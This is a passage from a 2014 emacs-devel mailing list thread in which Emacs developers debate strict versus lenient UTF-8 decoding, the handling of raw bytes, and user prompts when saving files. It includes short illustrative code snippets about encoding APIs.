> reject overlong encodings and other invalid byte sequences.  This is in
> direct conflict with the idea of "raw byte" code points, whose purpose
> is to be tolerant of arbitrary byte sequences and to propagate them
> unchanged.

The charset conversion functionality could support binary-transparent
UTF-8 and pure UTF-8 at output boundaries.  This way, the application
can make a choice.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-07 23:11                                                               ` Mark H Weaver
  2014-10-08  3:03                                                                 ` David Kastrup
@ 2014-10-11 18:50                                                                 ` Florian Weimer
  1 sibling, 0 replies; 261+ messages in thread
From: Florian Weimer @ 2014-10-11 18:50 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: David Kastrup, Richard Stallman, Andreas Schwab, dmantipov,
	emacs-devel, handa, monnier, Eli Zaretskii, stephen

* Mark H. Weaver:

> David Kastrup <dak@gnu.org> writes:
>> You cannot successfully cater for clueless application programmers.
>
> It is not "clueless" to expect a UTF-8 encoder to produce valid UTF-8.

It doesn't work all that well in practice on systems (like GNU) which
are not predominantly Unicode-based.  Dealing gracefully with invalid
UTF-8 sometimes means producing invalid UTF-8.

For example, a backup program needs to be able to save and restore
files whose name is not encoded in UTF-8.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  7:18                                                                 ` Eli Zaretskii
@ 2014-10-11 23:51                                                                   ` Mark H Weaver
  2014-10-12  1:35                                                                     ` Stephen J. Turnbull
  2014-10-12  5:37                                                                     ` Eli Zaretskii
  2014-10-12  3:24                                                                   ` Richard Stallman
  1 sibling, 2 replies; 261+ messages in thread
From: Mark H Weaver @ 2014-10-11 23:51 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

Eli Zaretskii <eliz@gnu.org> writes:

>> Date: Fri, 10 Oct 2014 21:15:26 -0400
>> From: Richard Stallman <rms@gnu.org>
>> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
>> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
>> 	stephen@xemacs.org
>> 
>>     > They don't HAVE to be treated the same.  We are talking about changes,
>>     > here.
>> 
>>     They will be very deep and invasive changes, because currently the
>>     encoding/decoding routines don't know the purpose of the stuff they
>>     are producing.
>> 
>> No, it's just a matter of setting some parameter to specify a particular
>> decision in decoding or encoding behavior.
>
> Specify, and then drag it all the way down the encoding/decoding
> machinery.

The strictness flag should conceptually be part of the encoding, and
thus associated with the I/O port.  This would obviate the need to
propagate it down through layers of code.

       Mark



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11 23:51                                                                   ` Mark H Weaver
@ 2014-10-12  1:35                                                                     ` Stephen J. Turnbull
  2014-10-12  8:38                                                                       ` David Kastrup
  2014-10-12  5:37                                                                     ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-12  1:35 UTC (permalink / raw)
  To: Mark H Weaver
  Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii

Mark H Weaver writes:
 > Eli Zaretskii <eliz@gnu.org> writes:

 > > Specify, and then drag it all the way down the encoding/decoding
 > > machinery.
 > 
 > The strictness flag should conceptually be part of the encoding, and
 > thus associated with the I/O port.

This is the way Emacs works already.

However, I think the Python system, where strictness is part of the
I/O port, not the encoding, and the encodings are designed to error
and then hand the invalid raw bytes to the error handler if desired,
is a better API.  I don't know how easy it would be to provide this in
Emacs (XEmacs streams are quite different from Emacs'), but it's
probably not too hard since the rawbytes facility is already present.
It would be nice to extend that to EOL handling as well IMO, but
that's not as big an issue.
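
For readers who have not used it, the Python arrangement looks roughly
like this: the codec name and the error handler are two separate
parameters of the text stream.  The helper `open_text_port` and the
sample data are made up; `io.TextIOWrapper` and its `errors` argument
are the real API.

```python
import io


def open_text_port(raw: bytes, errors: str) -> io.TextIOWrapper:
    """Wrap raw bytes in a text stream; `errors` picks the invalid-input policy."""
    return io.TextIOWrapper(io.BytesIO(raw), encoding="utf-8", errors=errors)


DATA = b"ok \xff end\n"  # 0xFF can never appear in valid UTF-8


def read_strict(raw: bytes):
    """Return the decoded text, or None if the strict port signals an error."""
    try:
        return open_text_port(raw, "strict").read()
    except UnicodeDecodeError:
        return None


def read_lenient(raw: bytes) -> str:
    """Same codec, different handler: invalid bytes survive as escapes."""
    return open_text_port(raw, "surrogateescape").read()
```

The encoding is "utf-8" in both cases; only the handler attached to the
port changes, which is the separation being argued for here.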

 > This would obviate the need to propagate it down through layers of
 > code.

It's not so easy, because the layers of code referred to are not the
encoding/decoding machinery in the sense of the coding system (ISTR
you use "codec", Emacs calls them "coding systems" to be more like ISO
2022 "coding extensions" IIRC).  It's the mechanism for determining
exactly which coding system is to be used, and the difficulties are
really in the area of UI more so than in API.

In Emacs Lisp there's a tradition of embedding parameters which are
normally specified as constants in the name.  (This issue has already
been referred to in different terms.)  So instead of

    ;; these IO functions are all imaginary
    (let ((s (open-file "foo")))
      (set-stream-coding-system s 'utf-8)
      (set-stream-eol s 'unix)                ; EOL is LF
      (set-stream-invalid-coding-handler s 'strict)
      ;; now we can do I/O, signaling errors on invalid coding
      (read-stream-into-buffer s))
    ;; and now we're ready to edit, assuming valid coding!

Emacs does

    (find-file "foo" 'utf-8-unix-strict)  ; or is it utf-8-strict-unix? arghh!
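
The naming problem can be sketched in Python.  The `-unix`, `-dos` and
`-mac` suffixes are real Emacs conventions; the `-strict` and
`-lenient` suffixes, the `StreamCoding` record and the parser are all
hypothetical, invented only to show that a combined name has to be
picked apart again and that suffix order becomes something users must
remember (or the parser must tolerate).

```python
from dataclasses import dataclass

EOL_NAMES = {"unix", "dos", "mac"}
HANDLER_NAMES = {"strict", "lenient"}  # hypothetical suffixes


@dataclass(frozen=True)
class StreamCoding:
    """The three decisions kept as separate parameters."""
    charset: str
    eol: str = "auto"
    on_invalid: str = "lenient"


def parse_coding_name(name: str) -> StreamCoding:
    """Split a combined name such as 'utf-8-unix-strict' into its parts.

    Trailing suffixes are accepted in any order so that
    'utf-8-unix-strict' and 'utf-8-strict-unix' mean the same thing.
    """
    parts = name.split("-")
    eol, on_invalid = "auto", "lenient"
    while parts and parts[-1] in EOL_NAMES | HANDLER_NAMES:
        suffix = parts.pop()
        if suffix in EOL_NAMES:
            eol = suffix
        else:
            on_invalid = suffix
    return StreamCoding("-".join(parts), eol, on_invalid)
```

Every additional parameter folded into the name multiplies the set of
symbols; keeping the parameters separate avoids that, at the cost of a
more verbose call.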

Things are further complicated by the fact that Emacs has an extremely
complex system for specifying the encoding and the newline convention
used, and either or both might be automatically detected.  All of the
parameters can be tweaked at any stage in the specification routines,
and there are about 5 levels of configurability for files
(configuration is done by setting or binding dynamic variables) and
more than one for network and process streams (which are different).
Adding specification of the error handling convention will make the
*user interface* yet more complicated -- and it has to be possible for
all this to be done separately for every stream (you might trust files
on your host but not the network).  And then there's the "auto" coding
system, which guesses the appropriate coding system by analyzing the
input.

I have always thought that the Emacs developers' emphasis on having
Emacs "DWIM" so much in this area is somewhat misplaced[1], but that is
the way things are and have been since the late 1980s (Emacs actually
installed these features in 1998 or so, but there were patches that
were universally used for Asian languages from the late 1980s), and
there will be a lot of resistance from users and developers to any
changes that require them to do things differently.


Footnotes: 
[1]  Historically, these features were developed by Japanese
developers, who have to deal with an insane environment where even
today you will encounter at least 5 major encodings on a daily basis
(cheating a little, since UTF-16 is usually visible only inside MSFT
file formats and in Java programming), and most of those have
innumerable private variants (most large corporations in Japan have
private sets of Chinese characters that are in Unicode but were
historically not in the Japanese national standards).  It's easy to
see why Japanese would want a good guessing facility!  Most of the
rest of us either don't have to deal with it (95% of what we see is in
one particular encoding), or have an extremely difficult problem in
distinguishing the ones common in our environment (is this Latin-1 or
Latin-9? vs. the Japanese case where the bit patterns of the major
encodings are very distinctive).

This is not to say that guessing is a bad idea where it can be done
accurately, just that the Emacs facilities are way too complex for the
benefit they provide over a much simpler system.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  7:18                                                                 ` David Kastrup
@ 2014-10-12  3:22                                                                   ` Richard Stallman
  0 siblings, 0 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-12  3:22 UTC (permalink / raw)
  To: David Kastrup; +Cc: mhw, dmantipov, emacs-devel, handa, monnier, eliz, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > It will be easy to specify one or the other, so why not make the default
    > be strict, except in the primitives that operate on files?

    Because we had that already.

What exactly did we have already?
Are we talking about the same thing?

    When we lost users in large droves to XEmacs at the time Emacs became
    the loss leader for multibyte encodings by making MULE mandatory, a
    significant number of those users who went were the ones not even using
    non-ASCII locales, and they would purportedly not even have noticed a
    difference with the files they were supposed to be working with.  But in
    practice, files and communications don't pass the purity tests.

I'm talking about the default for encodings that are NOT done for
reading and writing files.  You seem to be talking about files.

    > There are many ways for two different designs to be "similar".  They
    > are also different.  The details are crucial for users' reactions.  I
    > think the people who objected to those behaviors, which involved
    > changing the file contents, might not mind the confirmation much.

    That kind of choice would require the assumption that any file operation
    (and any other encoding/decoding action) is an immediate, direct, and
    obvious consequence of a user interaction with Emacs.

I don't quite follow you.  Could you present a concrete example to show
what you mean?

However, I think I follow part of it.  If a program does explicit
encoding and decoding operations but does them as part of showing text
to the user, it should specify doing them in the same flexible way
used by the usual file operations.

For instance, decoding an email to show to the user should be done the
flexible way.

It won't be hard to change these programs to specify "flexible" for
the decoding if that is not the default for the encoding primitives.

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  7:33                                                                 ` Eli Zaretskii
@ 2014-10-12  3:22                                                                   ` Richard Stallman
  2014-10-12  5:22                                                                     ` David Kastrup
  2014-10-12  5:44                                                                     ` Eli Zaretskii
  0 siblings, 2 replies; 261+ messages in thread
From: Richard Stallman @ 2014-10-12  3:22 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    >     Originally, Emacs would complain that Latin-1 cannot be used, and
    >     asked the user to select a different encoding.
    > 
    > That is about Latin-1.  What did Emacs do, at that time, with UTF-8?

    The situation I described is with text encodable by UTF-8, but not by
    Latin-1.  So it has no analogue when UTF-8 is used to begin with.

It looks like that past case isn't directly pertinent to this issue,
then.

    What will Emacs do, under this proposal, if the user is asked whether
    to keep the original raw bytes and answers NO?

Abort the operation, I suppose.

    Our experience with such prompts is that they are perceived as
    annoyances, no matter whether they happen at read or at write time.

Maybe so, but how big of an annoyance depends on how often it happens.

Those who are arguing for doing something to avoid propagating raw
bytes might want to implement an optional feature for asking for
confirmation before saving UTF-8 with raw bytes.  Then people could
try enabling that feature and we would see how often we get asked to
confirm.
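
A minimal sketch of such an opt-in check, written in Python rather than
Emacs Lisp and assuming raw bytes are represented as surrogate escapes
(U+DC80..U+DCFF).  The function names, the `ask_on_raw_bytes` switch
and the `SaveAborted` exception are hypothetical.

```python
from typing import Callable


class SaveAborted(Exception):
    """Raised when the user declines to save raw bytes."""


def has_raw_bytes(text: str) -> bool:
    """True if the text carries escaped undecodable bytes."""
    return any("\udc80" <= ch <= "\udcff" for ch in text)


def encode_for_save(
    text: str,
    confirm: Callable[[str], bool],
    ask_on_raw_bytes: bool = False,
) -> bytes:
    """Encode text for writing; optionally ask before keeping raw bytes.

    With ask_on_raw_bytes=False (the default) nothing changes for the
    user: raw bytes are written back silently.
    """
    if ask_on_raw_bytes and has_raw_bytes(text):
        if not confirm("Text contains raw bytes; save them unchanged?"):
            raise SaveAborted("user declined to save raw bytes")
    return text.encode("utf-8", errors="surrogateescape")
```

Counting how often `confirm` is invoked with the switch enabled would
give the kind of data asked for above.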

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11  7:18                                                                 ` Eli Zaretskii
  2014-10-11 23:51                                                                   ` Mark H Weaver
@ 2014-10-12  3:24                                                                   ` Richard Stallman
  2014-10-12  5:47                                                                     ` Eli Zaretskii
  1 sibling, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-12  3:24 UTC (permalink / raw)
  To: Eli Zaretskii; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    > No, it's just a matter of setting some parameter to specify a particular
    > decision in decoding or encoding behavior.

    Specify, and then drag it all the way down the encoding/decoding
    machinery.

Could you be more concrete about the problem you are talking about here?

    > It will be easy to specify one or the other, so why not make the default
    > be strict, except in the primitives that operate on files?

    Because I believe this will annoy users and cause a lot of
    complaining.

Would you please describe a concrete scenario in which this might
annoy users?

Assume that any operation which decodes text _for a user to see_
will specify flexible decoding.


-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-09 17:37                                                           ` Eli Zaretskii
@ 2014-10-12  3:24                                                             ` Richard Stallman
  2014-10-12  5:54                                                               ` Eli Zaretskii
  0 siblings, 1 reply; 261+ messages in thread
From: Richard Stallman @ 2014-10-12  3:24 UTC (permalink / raw)
  To: Eli Zaretskii
  Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

[[[ To any NSA and FBI agents reading my email: please consider    ]]]
[[[ whether defending the US Constitution against all enemies,     ]]]
[[[ foreign or domestic, requires you to follow Snowden's example. ]]]

    The protocols rarely specify encoding, AFAIK.  If they do, we do use
    them, e.g., when decoding an email message that specifies its MIME
    charset.  But that comes _after_ we already have read the mail into a
    buffer in its raw undecoded form.

There is no problem in that case.  You read it with raw-text,
you determine which encoding to decode, then you decode that one.
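
The three steps can be sketched with Python's standard `email` package
(this is only an analogy; it says nothing about how Rmail or Gnus do
it).  The sample message and the `decode_body` helper are made up, and
an unknown charset name would raise `LookupError` in this sketch.

```python
import email

RAW_MESSAGE = (
    b"Content-Type: text/plain; charset=iso-8859-1\r\n"
    b"Content-Transfer-Encoding: 8bit\r\n"
    b"\r\n"
    b"caf\xe9\r\n"
)


def decode_body(raw: bytes, fallback: str = "utf-8") -> str:
    """Read raw, find the declared charset, then decode with it."""
    # Step 1: parse the undecoded bytes; the body text is not interpreted yet.
    msg = email.message_from_bytes(raw)
    # Step 2: determine which encoding the message declares.
    charset = msg.get_content_charset() or fallback
    # Step 3: undo the transfer encoding, then decode with that charset.
    payload = msg.get_payload(decode=True)
    return payload.decode(charset, errors="replace")
```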

What is an example of a protocol that doesn't specify an encoding?  We
need to look at some real cases to see what is the right way to handle
them.

When we look at enough cases to see a pattern, then we could come up
with a general rule.

    And, of course, when you invoke a program locally, there's usually no
    protocol at all involved.

Likewise, we need to look at some real cases.  You can invoke any
program with M-!; I think in that case heuristic decoding is what
users want.  When functions run call-process on specific, what
decoding is really right?

-- 
Dr Richard Stallman
President, Free Software Foundation
51 Franklin St
Boston MA 02110
USA
www.fsf.org  www.gnu.org
Skype: No way! That's nonfree (freedom-denying) software.
  Use Ekiga or an ordinary phone call.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  3:22                                                                   ` Richard Stallman
@ 2014-10-12  5:22                                                                     ` David Kastrup
  2014-10-13  3:09                                                                       ` Richard Stallman
  2014-10-13  3:44                                                                       ` Richard Stallman
  2014-10-12  5:44                                                                     ` Eli Zaretskii
  1 sibling, 2 replies; 261+ messages in thread
From: David Kastrup @ 2014-10-12  5:22 UTC (permalink / raw)
  To: Richard Stallman
  Cc: mhw, dmantipov, emacs-devel, handa, monnier, Eli Zaretskii,
	stephen

Richard Stallman <rms@gnu.org> writes:

> [[[ To any NSA and FBI agents reading my email: please consider    ]]]
> [[[ whether defending the US Constitution against all enemies,     ]]]
> [[[ foreign or domestic, requires you to follow Snowden's example. ]]]
>
>     >     Originally, Emacs would complain that Latin-1 cannot be used, and
>     >     asked the user to select a different encoding.
>     > 
>     > That is about Latin-1.  What did Emacs do, at that time, with UTF-8?
>
>     The situation I described is with text encodable by UTF-8, but not by
>     Latin-1.  So it has no analogue when UTF-8 is used to begin with.
>
> It looks like that past case isn't directly pertinent to this issue,
> then.
>
>     What will Emacs do, under this proposal, if the user is asked whether
>     to keep the original raw bytes and answers NO?
>
> Abort the operation, I suppose.

It's going to be a wagonload of fun if I do

emacsclient `git grep -l some-pattern`

in order to edit 30 files and Emacs decides to abort and/or ask each
time a comment contains a stray latin-1 character.

>     Our experience with such prompts is that they are perceived as
>     annoyances, no matter whether they happen at read or at write time.
>
> Maybe so, but how big of an annoyance depends on how often it happens.

The main point is that annoyance does not serve a purpose.  It's like a
secretary who refuses to file letters with spelling errors in them.

-- 
David Kastrup



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-11 23:51                                                                   ` Mark H Weaver
  2014-10-12  1:35                                                                     ` Stephen J. Turnbull
@ 2014-10-12  5:37                                                                     ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-12  5:37 UTC (permalink / raw)
  To: Mark H Weaver; +Cc: dak, rms, dmantipov, emacs-devel, handa, monnier, stephen

> From: Mark H Weaver <mhw@netris.org>
> Cc: rms@gnu.org,  dak@gnu.org,  dmantipov@yandex.ru,  emacs-devel@gnu.org,  handa@gnu.org,  monnier@iro.umontreal.ca,  stephen@xemacs.org
> Date: Sat, 11 Oct 2014 19:51:45 -0400
> 
> Eli Zaretskii <eliz@gnu.org> writes:
> 
> >> No, it's just a matter of setting some parameter to specify a particular
> >> decision in decoding or encoding behavior.
> >
> > Specify, and then drag it all the way down the encoding/decoding
> > machinery.
> 
> The strictness flag should conceptually be part of the encoding, and
> thus associated with the I/O port.  This would obviate the need to
> propagate it down through layers of code.

We are talking about 2 different meanings of "propagate".  I was
talking about the need for the code at all levels to know about this
bit and "handle" it, like we do now with the different kinds of
"source" and "destination" of the encoding/decoding process.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  3:22                                                                   ` Richard Stallman
  2014-10-12  5:22                                                                     ` David Kastrup
@ 2014-10-12  5:44                                                                     ` Eli Zaretskii
  1 sibling, 0 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-12  5:44 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Sat, 11 Oct 2014 23:22:59 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     >     Originally, Emacs would complain that Latin-1 cannot be used, and
>     >     asked the user to select a different encoding.
>     > 
>     > That is about Latin-1.  What did Emacs do, at that time, with UTF-8?
> 
>     The situation I described is with text encodable by UTF-8, but not by
>     Latin-1.  So it has no analogue when UTF-8 is used to begin with.
> 
> It looks like that past case isn't directly pertinent to this issue,
> then.

I think it _is_ pertinent, because it demonstrates how intolerant
Emacs users are of prompts that appear where, by their (users')
standards, Emacs should simply silently DTRT (for some definition of
"Right").

>     What will Emacs do, under this proposal, if the user is asked whether
>     to keep the original raw bytes and answers NO?
> 
> Abort the operation, I suppose.

Good luck selling this to our users.

>     Our experience with such prompts is that they are perceived as
>     annoyances, no matter whether they happen at read or at write time.
> 
> Maybe so, but how big of an annoyance depends on how often it happens.

Our experience is that it happens "too often".

> Those who are arguing for doing something to avoid propagating raw
> bytes might want to implement an optional feature for asking for
> confirmation before saving UTF-8 with raw bytes.  Then people could
> try enabling that feature and we would see how often we get asked to
> confirm.

Fine by me.



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  3:24                                                                   ` Richard Stallman
@ 2014-10-12  5:47                                                                     ` Eli Zaretskii
  2014-10-13  3:07                                                                       ` Richard Stallman
  2014-10-13  3:38                                                                       ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-12  5:47 UTC (permalink / raw)
  To: rms; +Cc: dak, mhw, dmantipov, emacs-devel, handa, monnier, stephen

> Date: Sat, 11 Oct 2014 23:24:03 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mhw@netris.org, dmantipov@yandex.ru,
> 	emacs-devel@gnu.org, handa@gnu.org, monnier@iro.umontreal.ca,
> 	stephen@xemacs.org
> 
>     > No, it's just a matter of setting some parameter to specify a particular
>     > decision in decoding or encoding behavior.
> 
>     Specify, and then drag it all the way down the encoding/decoding
>     machinery.
> 
> Could you be more concrete about the problem you are talking about here?

The need to know about the semantics of this parameter all the way
through the multi-layered hierarchy of our encoding/decoding
implementation.

>     > It will be easy to specify one or the other, so why not make the default
>     > be strict, except in the primitives that operate on files?
> 
>     Because I believe this will annoy users and cause a lot of
>     complaining.
> 
> Would you please describe a concrete scenario in which this might
> annoy users?

I already did, at least twice.  I have no more scenarios to
contribute, sorry.

> Assume that any operation which decodes text _for a user to see_
> will specify flexible decoding.

That means almost all of them, more-or-less.  So it goes against what
AFAIU Mark had in mind with "strict UTF-8".



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  3:24                                                             ` Richard Stallman
@ 2014-10-12  5:54                                                               ` Eli Zaretskii
  2014-10-13  3:10                                                                 ` Richard Stallman
  2014-10-13  3:46                                                                 ` Richard Stallman
  0 siblings, 2 replies; 261+ messages in thread
From: Eli Zaretskii @ 2014-10-12  5:54 UTC (permalink / raw)
  To: rms; +Cc: dak, mikegerwitz, mhw, dmantipov, emacs-devel, handa, monnier,
	stephen

> Date: Sat, 11 Oct 2014 23:24:30 -0400
> From: Richard Stallman <rms@gnu.org>
> CC: dak@gnu.org, mikegerwitz@gnu.org, mhw@netris.org,
> 	dmantipov@yandex.ru, emacs-devel@gnu.org, handa@gnu.org,
> 	monnier@iro.umontreal.ca, stephen@xemacs.org
> 
> What is an example of a protocol that doesn't specify an encoding?

I'm not an expert, so I actually have trouble coming up with protocols
that _do_ specify an encoding.  Maybe someone else could help out.

>     And, of course, when you invoke a program locally, there's usually no
>     protocol at all involved.
> 
> Likewise, we need to look at some real cases.

Not sure what you mean by that.  M-! and M-| is what I had in mind.

> You can invoke any program with M-!; I think in that case heuristic
> decoding is what users want.

But that's about 99.99% of the uses.  So perhaps we are in violent
agreement after all.

> When functions run call-process on specific, what decoding is really
> right?

I don't think there's a way to know that, except in a very few
specific cases (like speller, for example).  We currently use an
encoding derived from the user locale, but that's a heuristic that
has known limitations and known use cases where it simply fails (but
no better guess is available).
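
The locale-derived guess, and the way it can fail, can be sketched in
Python.  `locale.getpreferredencoding` is the real call; the helper
name and the choice to keep undecodable bytes as surrogate escapes are
assumptions of this example, not a description of what Emacs does.

```python
import locale
from typing import Optional


def decode_process_output(raw: bytes, encoding: Optional[str] = None) -> str:
    """Decode subprocess output, guessing the encoding from the locale.

    If the guess is wrong, undecodable bytes are kept as escapes rather
    than lost, so the original output can still be recovered.
    """
    if encoding is None:
        encoding = locale.getpreferredencoding(False)
    return raw.decode(encoding, errors="surrogateescape")


def recover_bytes(text: str, encoding: str) -> bytes:
    """Undo decode_process_output for the same encoding."""
    return text.encode(encoding, errors="surrogateescape")
```

A program that emits Latin-1 while the user's locale says UTF-8 is the
known failure case: the guess is wrong, but with this policy the bytes
at least survive.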



^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  1:35                                                                     ` Stephen J. Turnbull
@ 2014-10-12  8:38                                                                       ` David Kastrup
  2014-10-12 12:16                                                                         ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-12  8:38 UTC (permalink / raw)
  To: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> Mark H Weaver writes:
>  > Eli Zaretskii <eliz@gnu.org> writes:
>
>  > > Specify, and then drag it all the way down the encoding/decoding
>  > > machinery.
>  > 
>  > The strictness flag should conceptually be part of the encoding, and
>  > thus associated with the I/O port.
>
> This is the way Emacs works already.
>
> However, I think the Python system, where strictness is part of the
> I/O port, not the encoding, and the encodings are designed to error
> and then hand the invalid raw bytes to the error handler if desired,
> is a better API.  I don't know how easy it would be to provide this in
> Emacs

Emacs uses CCL programs for encoding/decoding.  It would be a
performance disaster for loading files with binary parts (like
PostScript) to break out of the CCL program for every "invalid raw
byte".
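
The shape of that cost can be illustrated in Python, with the caveat
that this is an analogy and measures nothing about CCL: a custom codec
error handler is entered once per invalid sequence, so binary data
turns into one callback per byte.  The handler name "count-invalid" and
the helper are invented for the example.

```python
import codecs

_calls = 0


def _counting_handler(exc: UnicodeError):
    """Error handler that counts how often the decoder has to leave its loop."""
    global _calls
    _calls += 1
    # Substitute U+FFFD and resume right after the offending bytes.
    return ("\ufffd", exc.end)


codecs.register_error("count-invalid", _counting_handler)


def count_handler_calls(data: bytes) -> int:
    """Decode data as UTF-8 and report how many times the handler ran."""
    global _calls
    _calls = 0
    data.decode("utf-8", errors="count-invalid")
    return _calls
```

For a file with a large binary section, the number of handler calls
grows with the size of that section, which is the concern raised here.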

I cannot believe this, really.  We _fought_ all the Emacs 20 encoding
wars decades ago.  It looks like a bunch of armchair strategists trying
to reinvent the wheel but these are actually people fundamentally
involved with the original efforts.  Which makes this doubly
baffling.

Richard was _part_ of the Emacs 20 efforts and basically the one who
forced the MULE issue, and Stephen was on the XEmacs side which now has
ailed in popularity not least of all because Emacs tends to work better
in practice _now_ regarding the current prevalence of multibyte codings
in spite of XEmacs being earlier in aligning itself internally with
utf-8 (If memory serves me right).

I can understand GUILE developers being unaware of the experience we
gained through all those years.  But I am baffled at those who _led_ the
respective efforts wanting to repeat history, persuaded that everything
will be different next time round.  Actually not even that: it would
appear that our history and experience are not just treated as
irrelevant but rather as non-existent.

This thread is called "Emacs Lisp's future", but we seem determined to
plan this future starting in 1994 rather than 2014.

-- 
David Kastrup




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12  8:38                                                                       ` David Kastrup
@ 2014-10-12 12:16                                                                         ` Stephen J. Turnbull
  2014-10-12 12:34                                                                           ` David Kastrup
  0 siblings, 1 reply; 261+ messages in thread
From: Stephen J. Turnbull @ 2014-10-12 12:16 UTC (permalink / raw)
  To: David Kastrup; +Cc: emacs-devel

David Kastrup writes:

 > Richard was _part_ of the Emacs 20 efforts and basically the one
 > who forced the MULE issue, and Stephen was on the XEmacs side which
 > now has ailed in popularity not least of all because Emacs tends to
 > work better in practice _now_ regarding the current prevalence of
 > multibyte codings in

FWIW I don't recall it being a big deal, except for the noise you
personally made about rawbytes support for AUCTeX (and correctly so,
although we were unable to do anything about it as quickly as we would
have liked).

 > spite of XEmacs being earlier in aligning itself internally with
 > utf-8 (If memory serves me right).

XEmacs introduced Mule earlier, and was the development platform for
"UTF-2000" and later "Chise" XEmacs which did use UTF-8 internally,
but according to Ben who was doing most of the work at that time, that
code was unmaintainable and not adaptable for Windows so was not
adopted in the mainline.  XEmacs still uses Mule code internally.  (It
doesn't really matter except for convenience in the increasingly
important case of Unicode being the external encoding, and potentially
for access to externally developed software such as the UCD and ICU,
or even PEP 393.  The most important convenience is in design: Unicode
has already dealt with most of the interesting issues in character
sets.)

 > I can understand GUILE developers being unaware of the experience
 > we gained through all those years.  But I am baffled at those who
 > _led_ the respective efforts wanting to repeat history,

It's not a question of repeating history.  History cannot be repeated,
because Unicode has won.  Mule is a niche feature, of rapidly
decreasing importance.

And history can't be repeated for another reason.  Guile has no
history of incorporating Mule features, or even Mule-enabling
features.  The question is whether Guile should adopt features
designed in the 1990s for the 1990s environment (in *Japan*, the most
snafued charset environment imaginable, I'll remind you) in order to
better support Emacs, or whether Emacs should port existing support to
Guile.

The competition is severe, and there are many very strong alternatives
for the use cases Guile would like to serve: Java, Python, Perl, and
Ruby, and you can add PHP for web applications.  Guile can't afford to
acquire the kind of reputation that PHP had for carelessness in
security matters.




^ permalink raw reply	[flat|nested] 261+ messages in thread

* Re: Emacs Lisp's future
  2014-10-12 12:16                                                                         ` Stephen J. Turnbull
@ 2014-10-12 12:34                                                                           ` David Kastrup
  2014-10-12 14:49                                                                             ` Stephen J. Turnbull
  0 siblings, 1 reply; 261+ messages in thread
From: David Kastrup @ 2014-10-12 12:34 UTC (permalink / raw)
  To: Stephen J. Turnbull; +Cc: emacs-devel

"Stephen J. Turnbull" <stephen@xemacs.org> writes:

> The competition is severe, and there are many very strong alternatives
> for the use cases Guile would like to serve: Java, Python, Perl, and
> Ruby, and you can add PHP for web applications.  Guile can't afford to
> acquire the kind of reputation that PHP had for carelessness in
> security matters.

I don't buy the claims that the ability to faithfully represent
arbitrary input in a consistent and reproducible manner fully supported
